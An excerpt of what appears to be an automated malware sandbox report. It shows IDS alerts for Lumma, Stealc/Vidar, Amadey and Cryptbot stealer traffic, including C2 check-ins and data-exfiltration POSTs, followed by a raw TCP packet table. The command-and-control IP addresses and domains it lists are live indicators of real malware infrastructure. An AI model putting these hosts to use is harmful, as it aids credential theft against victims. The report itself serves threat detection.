                                                                                                                                                                                                                                                                          2024-12-21T01:14:58.917640+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M11192.168.2.549950116.203.12.114443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:59.528961+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.549953104.21.23.76443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:59.528961+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549953104.21.23.76443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:01.249672+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1116.203.12.114443192.168.2.549958TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:02.034539+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.549963104.21.23.76443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:02.034539+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549963104.21.23.76443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:02.039383+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.549963104.21.23.76443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:03.563029+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M11116.203.12.114443192.168.2.549966TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:04.599189+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.549972185.215.113.4380TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:06.157567+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.54997531.41.244.1180TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:08.315228+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.549992104.21.23.76443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:08.315228+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549992104.21.23.76443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:09.092745+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549992104.21.23.76443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:10.048358+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549998172.67.180.113443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:11.320447+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549998172.67.180.113443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:11.320447+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549998172.67.180.113443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:12.148820+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.550008185.215.113.4380TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:12.242971+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550011172.67.180.113443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:12.290709+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.55001531.41.244.1180TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:14.843200+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.55002131.41.244.1180TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:21.517409+01002044623ET MALWARE Amadey Bot Activity (POST)1192.168.2.550045185.215.113.4380TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:23.036234+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.55004631.41.244.1180TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:31.865412+01002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.550080185.121.15.19280TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:33.543749+01002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.550096185.121.15.19280TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:34.168754+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.550090185.215.113.4380TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:35.620897+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.55010531.41.244.1180TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:42.955787+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.550141185.215.113.4380TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:43.479854+01002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.550142185.121.15.19280TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:44.466068+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.550144185.215.113.1680TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:49.378015+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.5643191.1.1.153UDP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:49.574881+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.5527581.1.1.153UDP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:51.023303+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.550151172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:51.023303+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550151172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:51.589379+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.550152185.215.113.4380TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:51.764405+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.550151172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:51.764405+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.550151172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:52.998155+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.550157172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:52.998155+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550157172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:53.119656+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.550156185.215.113.1680TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:53.756642+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.550157172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:53.756642+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.550157172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:55.681620+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.550161172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:55.681620+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550161172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:56.550726+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.550161172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:57.811329+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.550163172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:15:57.811329+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550163172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:00.146336+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.550164172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:00.146336+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550164172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:01.419519+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.550165185.215.113.20680TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:01.692683+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.550166185.215.113.4380TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:01.868769+01002044244ET MALWARE Win32/Stealc Requesting browsers Config from C21192.168.2.550165185.215.113.20680TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:01.990830+01002044245ET MALWARE Win32/Stealc Active C2 Responding with browsers Config1185.215.113.20680192.168.2.550165TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:02.319188+01002044246ET MALWARE Win32/Stealc Requesting plugins Config from C21192.168.2.550165185.215.113.20680TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:02.394559+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.550167172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:02.394559+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550167172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:02.442183+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1185.215.113.20680192.168.2.550165TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:03.196463+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.550168185.215.113.1680TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:03.869653+01002044248ET MALWARE Win32/Stealc Submitting System Information to C21192.168.2.550165185.215.113.20680TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:04.490294+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.550165185.215.113.20680TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:05.169189+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.5515791.1.1.153UDP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:05.317514+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.5520281.1.1.153UDP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:05.586035+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.550169172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:05.586035+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550169172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:05.593253+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.550169172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:06.750743+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.550170172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:06.750743+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550170172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:07.522227+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.550170172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:07.522227+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.550170172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:09.072896+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.550178172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:09.072896+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550178172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:09.204692+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.550176185.215.113.4380TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:09.401577+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.550180172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:09.401577+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550180172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:09.866687+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.550178172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:09.866687+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.550178172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:10.239151+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.550180172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:10.703583+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.550181185.215.113.1680TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:11.767125+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.550182185.215.113.1680TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:17.111430+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.550205172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:17.111430+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550205172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:19.193764+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.550216172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:19.193764+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550216172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:19.384371+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.550213185.215.113.4380TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:21.323075+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.550217172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:21.323075+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550217172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:23.665889+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.550220172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:23.665889+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550220172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:26.541293+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.550223172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:26.541293+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550223172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:26.571237+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.550223172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:26.571237+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.550223172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:31.127252+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.550225172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:31.127252+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550225172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:31.761725+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.550225172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:33.273700+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.550229185.215.113.1680TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:40.421914+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.550235185.215.113.20680TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:41.245299+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.5598991.1.1.153UDP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:41.402522+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.5634841.1.1.153UDP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:42.262156+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.550235185.215.113.20680TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:42.832038+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.550266172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:42.832038+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550266172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:43.559365+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.550235185.215.113.20680TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:43.656279+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.550266172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:43.656279+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.550266172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:44.600463+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.550235185.215.113.20680TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:44.891244+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.550274172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:44.891244+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550274172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:45.671072+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.550274172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:45.671072+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.550274172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:47.440474+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.550278172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:47.440474+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550278172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:48.070175+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.550235185.215.113.20680TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:49.120751+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.550235185.215.113.20680TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:49.577689+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.550279172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:49.577689+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550279172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:51.751651+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.550281172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:51.751651+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550281172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:54.036718+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.550286172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:54.036718+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550286172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:56.171112+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.550288172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:56.171112+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550288172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:57.100415+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.550288172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:57.100415+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.550288172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:57.683367+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.550289185.215.113.20680TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:58.373137+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.550291172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:58.373137+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550291172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:16:59.022303+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.550291172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:17:00.489127+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.550294185.215.113.1680TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:17:00.781794+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.550293185.215.113.20680TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:17:04.312888+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.550296185.215.113.20680TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:17:11.012824+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.550300185.215.113.20680TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:17:13.035808+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.550301185.215.113.20680TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:18:24.506220+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.550376TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:18:25.850691+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.550378185.215.113.4380TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:19:11.745916+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.550394185.215.113.4380TCP

                                                                                                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:04.949800014 CET4981480192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:05.069453955 CET8049814185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:05.069565058 CET4981480192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:05.069822073 CET4981480192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:05.189399958 CET8049814185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:06.475291967 CET8049814185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:06.475462914 CET4981480192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:07.997018099 CET4981480192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:08.000843048 CET4982380192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:08.117039919 CET8049814185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:08.117121935 CET4981480192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:08.120357037 CET8049823185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:08.120445013 CET4982380192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:08.120657921 CET4982380192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:08.240214109 CET8049823185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:09.486785889 CET8049823185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:09.486848116 CET8049823185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:09.486999989 CET4982380192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:09.490914106 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:09.610640049 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:09.610783100 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:09.611090899 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:09.730772018 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:10.947586060 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:10.947662115 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:10.947678089 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:10.947712898 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:10.947725058 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:10.947752953 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:10.947765112 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:10.947799921 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:10.947803020 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:10.947834015 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:10.947838068 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:10.947881937 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:10.947886944 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:10.947925091 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:10.947938919 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:10.947973013 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:10.947978020 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:10.948009968 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:10.948049068 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:10.948095083 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.067568064 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.067629099 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.067692995 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.068744898 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.071739912 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.071814060 CET4982880192.168.2.531.41.244.11
